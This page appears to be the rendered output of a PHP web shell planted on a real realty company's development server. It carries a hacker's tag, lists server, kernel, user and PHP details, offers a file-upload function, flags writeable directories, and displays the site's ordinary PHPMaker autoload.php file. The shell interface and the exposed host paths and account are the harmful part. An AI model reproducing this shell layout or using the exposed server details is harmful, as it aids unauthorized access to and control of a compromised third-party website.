Heray-Was-Here
Server : Apache
System : Linux hybrid3195.ca.ns.planethoster.net 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User : alliancerealtynb ( 1004)
PHP Version : 7.4.33
Disable Function : noop
Directory :  /home/alliancerealtynb/dev.alliancerealty.nb.ca/adminAR/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/alliancerealtynb/dev.alliancerealty.nb.ca/adminAR/autoload.php
<?php
namespace PHPMaker2020\Alliance;

// Relative path
if (!isset($RELATIVE_PATH))
	$RELATIVE_PATH = "";

// Composer autoloader
if (file_exists($RELATIVE_PATH . "vendor/autoload.php"))
	require_once $RELATIVE_PATH . "vendor/autoload.php";
else
	die("Composer generated autoload.php does not exist. Make sure you have run \"composer update\" at the destionation folder on your development computer and uploaded the \"vendor\" subfolder.");

// Include files
include_once $RELATIVE_PATH . "ewcfg.php";
if (USE_ADODB)
	include_once $RELATIVE_PATH . "adodb5/adodb.inc.php";
include_once $RELATIVE_PATH . "phpfn.php";

// Autoloader
spl_autoload_register(PROJECT_NAMESPACE . "Autoloader");

// Global code
include_once $RELATIVE_PATH . "userfn.php";
?>

Hry